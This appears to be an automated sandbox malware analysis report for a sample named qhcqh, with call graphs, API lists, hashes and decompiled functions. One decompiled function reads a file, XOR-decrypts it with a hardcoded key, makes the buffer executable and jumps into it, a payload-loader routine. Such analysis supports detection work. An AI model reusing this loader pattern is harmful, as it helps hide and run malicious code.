8023->8024 8024->8016 8011 c54c9c 8012 c54cae 8011->8012 8014 c54cbc @_EH4_CallFilterFunc@8 8011->8014 8013 c564ea __setmbcp_nolock 5 API calls 8012->8013 8013->8014 8093 c5465c 8094 c54669 8093->8094 8095 c56450 __calloc_crt 68 API calls 8094->8095 8096 c54683 8095->8096 8097 c56450 __calloc_crt 68 API calls 8096->8097 8098 c5469c 8096->8098 8097->8098 8223 c5883c RtlUnwind 8224 c5213c 8225 c5214c 8224->8225 8226 c52158 DeleteCriticalSection 8225->8226 8227 c52170 8225->8227 8228 c5637d ___endstdio 68 API calls 8226->8228 8229 c52182 DeleteCriticalSection 8227->8229 8230 c52190 8227->8230 8228->8225 8229->8227 8105 c51e7f 8106 c51e94 8105->8106 8107 c51e8e 8105->8107 8111 c53257 8106->8111 8108 c53232 _abort 68 API calls 8107->8108 8108->8106 8110 c51e99 __setmbcp 8112 c530f0 _doexit 68 API calls 8111->8112 8113 c53262 8112->8113 8113->8110 8025 c51ebe 8028 c56278 8025->8028 8027 c51ec3 8027->8027 8029 c5629d 8028->8029 8030 c562aa GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 8028->8030 8029->8030 8031 c562a1 8029->8031 8030->8031 8031->8027

                                                                                                                        Executed Functions

                                                                                                                        Function 027F31D7 Relevance: 6.5, APIs: 4, Instructions: 528COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 259 27f31d7-27f32fc call 27f297f call 27f3158 call 27f2993 * 8 281 27f32fe 259->281 282 27f3303-27f3313 259->282 283 27f3881-27f3884 281->283 285 27f331a-27f333d CreateFileW 282->285 286 27f3315 282->286 287 27f333f 285->287 288 27f3344-27f336a VirtualAlloc ReadFile 285->288 286->283 287->283 289 27f336c 288->289 290 27f3371-27f3384 288->290 289->283 292 27f386b-27f387a call 27f2b2a 290->292 293 27f338a-27f3866 290->293 296 27f387c-27f387e ExitProcess 292->296
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.261999809.00000000027F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 027F2000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_27f2000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocNumaVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4233825816-0
                                                                                                                        • Opcode ID: aab43d63b7fc4409e11da9c5c8e345d12a9d421ce4ba99d4990fe4a300c93c4c
                                                                                                                        • Instruction ID: 087f62291015cc1a6b43dc879f3b9e7d81f1c9278004b313caca414b5155d0d4
                                                                                                                        • Opcode Fuzzy Hash: aab43d63b7fc4409e11da9c5c8e345d12a9d421ce4ba99d4990fe4a300c93c4c
                                                                                                                        • Instruction Fuzzy Hash: 47326220D5D2D8ADDB42CBE984547FCBFB05F26202F0845DAE5E4B6283C53A834EDB25
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 027F30FA Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 346 27f30fa-27f3140 call 27f297f call 27f2993 GetSystemInfo 352 27f3149 346->352 353 27f3142-27f3145 346->353 354 27f314b-27f314e 352->354 353->354
                                                                                                                        APIs
                                                                                                                        • GetSystemInfo.KERNELBASE(?), ref: 027F3117
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.261999809.00000000027F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 027F2000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_27f2000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 31276548-0
                                                                                                                        • Opcode ID: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                                                                                                        • Instruction ID: 394c6944cd1db4a4423f1314c27be5ef874dc638be0e5b16e8c3b14553ff20ba
                                                                                                                        • Opcode Fuzzy Hash: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                                                                                                        • Instruction Fuzzy Hash: 73F0EC71D1C50CABEF88EAF8C8496AEB7EDD709210F10457DDF46E3340E53485408761
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00C51000 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        C-Code - Quality: 61%
                                                                                                                        			E00C51000(intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v20;
				char* _v24;
				long _v28;
				void* _v32;
				long _v36;
				intOrPtr _t35;
				long _t37;
				void* _t40;
				void* _t51;
				void* _t60;
				void* _t70;
				void* _t71;
				void* _t79;

				_v12 = 0;
				_v28 = 0;
				_v24 = "248058040134";
				_t35 = E00C51729(_a12, 0xc60088); // executed
				_v20 = _t35;
				_push(2);
				_push(0);
				_push(_v20); // executed
				E00C51C92(_t51, _t60, _t70, _t71, _t79); // executed
				_t61 = _v20;
				_push(_v20); // executed
				_t37 = E00C51B9A(_t51, _v20, _t70, _t71, _t79); // executed
				_v28 = _t37;
				_push(0);
				_push(0);
				_push(_v20); // executed
				E00C51C92(_t51, _v20, _t70, _t71, _t79); // executed
				_t40 = E00C51514(_t51, _t61, _t70, _v28); // executed
				_v32 = _t40;
				E00C519E0(_v32, _v28, 1, _v20); // executed
				while(_v12 < _v28) {
					asm("cdq");
					 *(_v32 + _v12) =  *(_v32 + _v12) & 0x000000ff ^ _v24[_v12 % 0xc] & 0x000000ff;
					_v12 = _v12 + 1;
				}
				VirtualProtect(_v32, _v28, 0x40,  &_v36); // executed
				goto __eax;
			}

















                                                                                                                        0x00c51006
                                                                                                                        0x00c5100d
                                                                                                                        0x00c51014
                                                                                                                        0x00c51024
                                                                                                                        0x00c5102c
                                                                                                                        0x00c5102f
                                                                                                                        0x00c51031
                                                                                                                        0x00c51036
                                                                                                                        0x00c51037
                                                                                                                        0x00c5103f
                                                                                                                        0x00c51042
                                                                                                                        0x00c51043
                                                                                                                        0x00c5104b
                                                                                                                        0x00c5104e
                                                                                                                        0x00c51050
                                                                                                                        0x00c51055
                                                                                                                        0x00c51056
                                                                                                                        0x00c51062
                                                                                                                        0x00c5106a
                                                                                                                        0x00c5107b
                                                                                                                        0x00c51083
                                                                                                                        0x00c5108e
                                                                                                                        0x00c510ae
                                                                                                                        0x00c510b6
                                                                                                                        0x00c510b6
                                                                                                                        0x00c510c9
                                                                                                                        0x00c510d2

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00C51729: __fsopen.LIBCMT ref: 00C51736
                                                                                                                        • _fseek.LIBCMT ref: 00C51037
                                                                                                                        • _ftell.LIBCMT ref: 00C51043
                                                                                                                        • _fseek.LIBCMT ref: 00C51056
                                                                                                                          • Part of subcall function 00C51C92: __lock_file.LIBCMT ref: 00C51CDD
                                                                                                                          • Part of subcall function 00C51C92: __fseek_nolock.LIBCMT ref: 00C51CED
                                                                                                                        • _malloc.LIBCMT ref: 00C51062
                                                                                                                          • Part of subcall function 00C51514: __FF_MSGBANNER.LIBCMT ref: 00C51537
                                                                                                                          • Part of subcall function 00C51514: __NMSG_WRITE.LIBCMT ref: 00C5153E
                                                                                                                          • Part of subcall function 00C51514: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,00C5641C,?,00000001,?,?,00C521F7,00000018,00C5D4A8,0000000C,00C52288), ref: 00C5158B
                                                                                                                        • __fread_nolock.LIBCMT ref: 00C5107B
                                                                                                                        • VirtualProtect.KERNELBASE(?,00000000,00000040,?), ref: 00C510C9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.261926727.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.261919693.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261949779.0000000000C5C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261956673.0000000000C5F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261963259.0000000000C62000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_c50000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _fseek$AllocateHeapProtectVirtual__fread_nolock__fseek_nolock__fsopen__lock_file_ftell_malloc
                                                                                                                        • String ID: x
                                                                                                                        • API String ID: 2202995300-2363233923
                                                                                                                        • Opcode ID: dbbdffd16f615c1317cca7beef7254ae651ab1d483507e9794f9a7a419d8e91b
                                                                                                                        • Instruction ID: 36af55cb058fdef0922aa14ec83b3c8e0932865ec605dbdd177bb15257873013
                                                                                                                        • Opcode Fuzzy Hash: dbbdffd16f615c1317cca7beef7254ae651ab1d483507e9794f9a7a419d8e91b
                                                                                                                        • Instruction Fuzzy Hash: 012181B5E00209AFDB04DFD4C886FBFBB75BF84301F184558EA11AB281D775A985CB94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 027F3885 Relevance: 10.7, APIs: 7, Instructions: 194filememoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,027F411B,7FAB7E30), ref: 027F394B
                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,027F411B,7FAB7E30,027F3DD9,00000000,00000040), ref: 027F3975
                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,027F411B,7FAB7E30,027F3DD9,00000000), ref: 027F398C
                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,027F411B,7FAB7E30,027F3DD9,00000000,00000040), ref: 027F39AE
                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,027F411B,7FAB7E30,027F3DD9,00000000,00000040,?,00000000,0000000E), ref: 027F3A20
                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,027F411B,7FAB7E30,027F3DD9,00000000,00000040,?), ref: 027F3A2B
                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,027F411B,7FAB7E30,027F3DD9,00000000,00000040,?), ref: 027F3A76
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.261999809.00000000027F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 027F2000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_27f2000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 656311269-0
                                                                                                                        • Opcode ID: cea410d2c00c7acebd666830aefc4fe95d49e0c1d5daca2ebecdef602d85234b
                                                                                                                        • Instruction ID: ca15ba8b81a7c5f7fcc6f328182dbbd8b12d6e5879565379d46bc90b749dcb56
                                                                                                                        • Opcode Fuzzy Hash: cea410d2c00c7acebd666830aefc4fe95d49e0c1d5daca2ebecdef602d85234b
                                                                                                                        • Instruction Fuzzy Hash: 08519E71E08358ABDB51DFB5CC84BAEB7B9AF08710F104559FA45F7380E7749A008B68
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00C51740 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 68 c51740-c5175c 69 c5177f 68->69 70 c5175e-c51761 68->70 71 c51781-c51785 69->71 70->69 72 c51763-c51765 70->72 73 c51767-c51776 call c534da 72->73 74 c51786-c5178b 72->74 84 c51777-c5177c call c54636 73->84 76 c5178d-c51798 74->76 77 c5179a-c5179d 74->77 76->77 79 c517bb-c517ce 76->79 80 c5179f-c517a7 call c55600 77->80 81 c517aa-c517ac 77->81 82 c517d0-c517d6 79->82 83 c517d8 79->83 80->81 81->73 86 c517ae-c517b9 81->86 87 c517df-c517e1 82->87 83->87 84->69 86->73 86->79 90 c517e7-c517ee 87->90 91 c518d1-c518d4 87->91 93 c51834-c51837 90->93 94 c517f0-c517f5 90->94 91->71 96 c518a1-c518a2 call c54d5f 93->96 97 c51839-c5183d 93->97 94->93 95 c517f7 94->95 98 c51932 95->98 99 c517fd-c51801 95->99 108 c518a7-c518ab 96->108 101 c5183f-c51848 97->101 102 c5185e-c51865 97->102 103 c51936-c5193f 98->103 106 c51805-c51808 99->106 107 c51803 99->107 109 c51853-c51858 101->109 110 c5184a-c51851 101->110 104 c51867 102->104 105 c51869-c5186c 102->105 103->71 104->105 112 c51905-c51909 105->112 113 c51872-c5187e call c55549 call c5544c 105->113 114 c5180e-c5182f call c5557b 106->114 115 c518d9-c518df 106->115 107->106 108->103 116 c518b1-c518b5 108->116 111 c5185a-c5185c 109->111 110->111 111->105 122 c5191b-c5192d call c534da 112->122 123 c5190b-c51918 call c55600 112->123 136 c51883-c51888 113->136 124 c518c9-c518cb 114->124 118 c518e1-c518ed call c55600 115->118 119 c518f0-c51900 call c534da 115->119 116->112 117 c518b7-c518c6 116->117 117->124 118->119 119->84 122->84 123->122 124->90 124->91 137 c51944-c51948 136->137 138 c5188e-c51891 136->138 137->103 138->98 139 c51897-c5189f 138->139 139->124
                                                                                                                        C-Code - Quality: 86%
                                                                                                                        			E00C51740(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t90;
				intOrPtr* _t92;
				signed int _t94;
				char _t97;
				signed int _t105;
				signed int _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t114;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				char* _t121;
				signed int _t126;
				signed int _t132;
				signed int _t134;
				void* _t135;

				_t126 = __edx;
				_t121 = _a4;
				_t119 = _a8;
				_t132 = 0;
				_v12 = _t121;
				_v8 = _t119;
				if(_a12 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t139 = _t121;
					if(_t121 != 0) {
						_t134 = _a20;
						__eflags = _t134;
						if(_t134 == 0) {
							L9:
							__eflags = _t119 - 0xffffffff;
							if(_t119 != 0xffffffff) {
								_t90 = E00C55600(_t132, _t121, _t132, _t119);
								_t135 = _t135 + 0xc;
							}
							__eflags = _t134 - _t132;
							if(__eflags == 0) {
								goto L3;
							} else {
								_t94 = _t90 | 0xffffffff;
								_t126 = _t94 % _a12;
								__eflags = _a16 - _t94 / _a12;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t132 = _a12 * _a16;
								__eflags =  *(_t134 + 0xc) & 0x0000010c;
								_v20 = _t132;
								_t120 = _t132;
								if(( *(_t134 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t134 + 0x18));
								}
								__eflags = _t132;
								if(_t132 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t134 + 0xc) & 0x0000010c;
										if(( *(_t134 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t120 - _v16;
											if(_t120 < _v16) {
												_t97 = E00C54D5F(_t120, _t126, _t134); // executed
												__eflags = _t97 - 0xffffffff;
												if(_t97 == 0xffffffff) {
													L48:
													return (_t132 - _t120) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L44:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E00C55600(_t132, _a4, 0, _a8);
														_t135 = _t135 + 0xc;
													}
													 *((intOrPtr*)(E00C534DA(__eflags))) = 0x22;
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													L4:
													E00C54636(_t126, _t132, _t134);
													goto L5;
												}
												_v12 = _v12 + 1;
												 *_v12 = _t97;
												_t120 = _t120 - 1;
												_t70 =  &_v8;
												 *_t70 = _v8 - 1;
												__eflags =  *_t70;
												_v16 =  *((intOrPtr*)(_t134 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t105 = 0x7fffffff;
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t105 = _t120;
												}
											} else {
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t55 = _t120 % _v16;
													__eflags = _t55;
													_t126 = _t55;
													_t110 = _t120;
												} else {
													_t126 = 0x7fffffff % _v16;
													_t110 = 0x7fffffff;
												}
												_t105 = _t110 - _t126;
											}
											__eflags = _t105 - _v8;
											if(_t105 > _v8) {
												goto L44;
											} else {
												_push(_t105);
												_push(_v12);
												_push(E00C55549(_t126, _t132, _t134)); // executed
												_t107 = E00C5544C(_t120, _t126, _t132, _t134, __eflags); // executed
												_t135 = _t135 + 0xc;
												__eflags = _t107;
												if(_t107 == 0) {
													 *(_t134 + 0xc) =  *(_t134 + 0xc) | 0x00000010;
													goto L48;
												}
												__eflags = _t107 - 0xffffffff;
												if(_t107 == 0xffffffff) {
													L47:
													_t80 = _t134 + 0xc;
													 *_t80 =  *(_t134 + 0xc) | 0x00000020;
													__eflags =  *_t80;
													goto L48;
												}
												_v12 = _v12 + _t107;
												_t120 = _t120 - _t107;
												_v8 = _v8 - _t107;
												goto L39;
											}
										}
										_t113 =  *(_t134 + 4);
										__eflags = _t113;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L47;
										}
										_t132 = _t120;
										__eflags = _t120 - _t113;
										if(_t120 >= _t113) {
											_t132 = _t113;
										}
										__eflags = _t132 - _v8;
										if(_t132 > _v8) {
											_t134 = 0;
											__eflags = _a8 - 0xffffffff;
											if(__eflags != 0) {
												E00C55600(_t132, _a4, 0, _a8);
												_t135 = _t135 + 0xc;
											}
											_t114 = E00C534DA(__eflags);
											_push(_t134);
											_push(_t134);
											_push(_t134);
											_push(_t134);
											 *_t114 = 0x22;
											_push(_t134);
											goto L4;
										} else {
											E00C5557B(_t120, _t126, _v12, _v8,  *_t134, _t132);
											 *(_t134 + 4) =  *(_t134 + 4) - _t132;
											 *_t134 =  *_t134 + _t132;
											_v12 = _v12 + _t132;
											_t120 = _t120 - _t132;
											_t135 = _t135 + 0x10;
											_v8 = _v8 - _t132;
											_t132 = _v20;
										}
										L39:
										__eflags = _t120;
									} while (_t120 != 0);
									goto L40;
								}
							}
						}
						_t118 = _t90 | 0xffffffff;
						_t90 = _t118 / _a12;
						_t126 = _t118 % _a12;
						__eflags = _a16 - _t90;
						if(_a16 <= _t90) {
							goto L13;
						}
						goto L9;
					}
					L3:
					_t92 = E00C534DA(_t139);
					_push(_t132);
					_push(_t132);
					_push(_t132);
					_push(_t132);
					 *_t92 = 0x16;
					_push(_t132);
					goto L4;
				}
			}




























                                                                                                                        0x00c51740
                                                                                                                        0x00c51748
                                                                                                                        0x00c5174c
                                                                                                                        0x00c51751
                                                                                                                        0x00c51753
                                                                                                                        0x00c51756
                                                                                                                        0x00c5175c
                                                                                                                        0x00c5177f
                                                                                                                        0x00000000
                                                                                                                        0x00c51763
                                                                                                                        0x00c51763
                                                                                                                        0x00c51765
                                                                                                                        0x00c51786
                                                                                                                        0x00c51789
                                                                                                                        0x00c5178b
                                                                                                                        0x00c5179a
                                                                                                                        0x00c5179a
                                                                                                                        0x00c5179d
                                                                                                                        0x00c517a2
                                                                                                                        0x00c517a7
                                                                                                                        0x00c517a7
                                                                                                                        0x00c517aa
                                                                                                                        0x00c517ac
                                                                                                                        0x00000000
                                                                                                                        0x00c517ae
                                                                                                                        0x00c517ae
                                                                                                                        0x00c517b3
                                                                                                                        0x00c517b6
                                                                                                                        0x00c517b9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00c517bb
                                                                                                                        0x00c517be
                                                                                                                        0x00c517c2
                                                                                                                        0x00c517c9
                                                                                                                        0x00c517cc
                                                                                                                        0x00c517ce
                                                                                                                        0x00c517d8
                                                                                                                        0x00c517d0
                                                                                                                        0x00c517d3
                                                                                                                        0x00c517d3
                                                                                                                        0x00c517df
                                                                                                                        0x00c517e1
                                                                                                                        0x00c518d1
                                                                                                                        0x00000000
                                                                                                                        0x00c517e7
                                                                                                                        0x00c517e7
                                                                                                                        0x00c517e7
                                                                                                                        0x00c517ee
                                                                                                                        0x00c51834
                                                                                                                        0x00c51834
                                                                                                                        0x00c51837
                                                                                                                        0x00c518a2
                                                                                                                        0x00c518a8
                                                                                                                        0x00c518ab
                                                                                                                        0x00c51936
                                                                                                                        0x00000000
                                                                                                                        0x00c5193c
                                                                                                                        0x00c518b1
                                                                                                                        0x00c518b5
                                                                                                                        0x00c51905
                                                                                                                        0x00c51905
                                                                                                                        0x00c51909
                                                                                                                        0x00c51913
                                                                                                                        0x00c51918
                                                                                                                        0x00c51918
                                                                                                                        0x00c51920
                                                                                                                        0x00c51928
                                                                                                                        0x00c51929
                                                                                                                        0x00c5192a
                                                                                                                        0x00c5192b
                                                                                                                        0x00c5192c
                                                                                                                        0x00c51777
                                                                                                                        0x00c51777
                                                                                                                        0x00000000
                                                                                                                        0x00c5177c
                                                                                                                        0x00c518ba
                                                                                                                        0x00c518bd
                                                                                                                        0x00c518c2
                                                                                                                        0x00c518c3
                                                                                                                        0x00c518c3
                                                                                                                        0x00c518c3
                                                                                                                        0x00c518c6
                                                                                                                        0x00000000
                                                                                                                        0x00c518c6
                                                                                                                        0x00c51839
                                                                                                                        0x00c5183d
                                                                                                                        0x00c5185e
                                                                                                                        0x00c51863
                                                                                                                        0x00c51865
                                                                                                                        0x00c51867
                                                                                                                        0x00c51867
                                                                                                                        0x00c5183f
                                                                                                                        0x00c51846
                                                                                                                        0x00c51848
                                                                                                                        0x00c51855
                                                                                                                        0x00c51855
                                                                                                                        0x00c51855
                                                                                                                        0x00c51858
                                                                                                                        0x00c5184a
                                                                                                                        0x00c5184c
                                                                                                                        0x00c5184f
                                                                                                                        0x00c5184f
                                                                                                                        0x00c5185a
                                                                                                                        0x00c5185a
                                                                                                                        0x00c51869
                                                                                                                        0x00c5186c
                                                                                                                        0x00000000
                                                                                                                        0x00c51872
                                                                                                                        0x00c51872
                                                                                                                        0x00c51873
                                                                                                                        0x00c5187d
                                                                                                                        0x00c5187e
                                                                                                                        0x00c51883
                                                                                                                        0x00c51886
                                                                                                                        0x00c51888
                                                                                                                        0x00c51944
                                                                                                                        0x00000000
                                                                                                                        0x00c51944
                                                                                                                        0x00c5188e
                                                                                                                        0x00c51891
                                                                                                                        0x00c51932
                                                                                                                        0x00c51932
                                                                                                                        0x00c51932
                                                                                                                        0x00c51932
                                                                                                                        0x00000000
                                                                                                                        0x00c51932
                                                                                                                        0x00c51897
                                                                                                                        0x00c5189a
                                                                                                                        0x00c5189c
                                                                                                                        0x00000000
                                                                                                                        0x00c5189c
                                                                                                                        0x00c5186c
                                                                                                                        0x00c517f0
                                                                                                                        0x00c517f3
                                                                                                                        0x00c517f5
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00c517f7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00c517fd
                                                                                                                        0x00c517ff
                                                                                                                        0x00c51801
                                                                                                                        0x00c51803
                                                                                                                        0x00c51803
                                                                                                                        0x00c51805
                                                                                                                        0x00c51808
                                                                                                                        0x00c518d9
                                                                                                                        0x00c518db
                                                                                                                        0x00c518df
                                                                                                                        0x00c518e8
                                                                                                                        0x00c518ed
                                                                                                                        0x00c518ed
                                                                                                                        0x00c518f0
                                                                                                                        0x00c518f5
                                                                                                                        0x00c518f6
                                                                                                                        0x00c518f7
                                                                                                                        0x00c518f8
                                                                                                                        0x00c518f9
                                                                                                                        0x00c518ff
                                                                                                                        0x00000000
                                                                                                                        0x00c5180e
                                                                                                                        0x00c51817
                                                                                                                        0x00c5181c
                                                                                                                        0x00c5181f
                                                                                                                        0x00c51821
                                                                                                                        0x00c51824
                                                                                                                        0x00c51826
                                                                                                                        0x00c51829
                                                                                                                        0x00c5182c
                                                                                                                        0x00c5182c
                                                                                                                        0x00c518c9
                                                                                                                        0x00c518c9
                                                                                                                        0x00c518c9
                                                                                                                        0x00000000
                                                                                                                        0x00c517e7
                                                                                                                        0x00c517e1
                                                                                                                        0x00c517ac
                                                                                                                        0x00c5178d
                                                                                                                        0x00c51792
                                                                                                                        0x00c51792
                                                                                                                        0x00c51795
                                                                                                                        0x00c51798
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00c51798
                                                                                                                        0x00c51767
                                                                                                                        0x00c51767
                                                                                                                        0x00c5176c
                                                                                                                        0x00c5176d
                                                                                                                        0x00c5176e
                                                                                                                        0x00c5176f
                                                                                                                        0x00c51770
                                                                                                                        0x00c51776
                                                                                                                        0x00000000
                                                                                                                        0x00c51776

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.261926727.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.261919693.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261949779.0000000000C5C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261956673.0000000000C5F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261963259.0000000000C62000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_c50000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3886058894-0
                                                                                                                        • Opcode ID: 40170541d33e265b3539f4033dc8dda6a6932d7f878273194110051ae8df41d2
                                                                                                                        • Instruction ID: aed36d9fd7a0500f865a42e487300c63c2caefce38f4ce12d0a1d11b99c5096e
                                                                                                                        • Opcode Fuzzy Hash: 40170541d33e265b3539f4033dc8dda6a6932d7f878273194110051ae8df41d2
                                                                                                                        • Instruction Fuzzy Hash: CA51E538900604EFCB209F6A884C69EBBB5EF41362F1D8269FC35521D1D7309ED8DB58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 027F2B2A Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 425COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
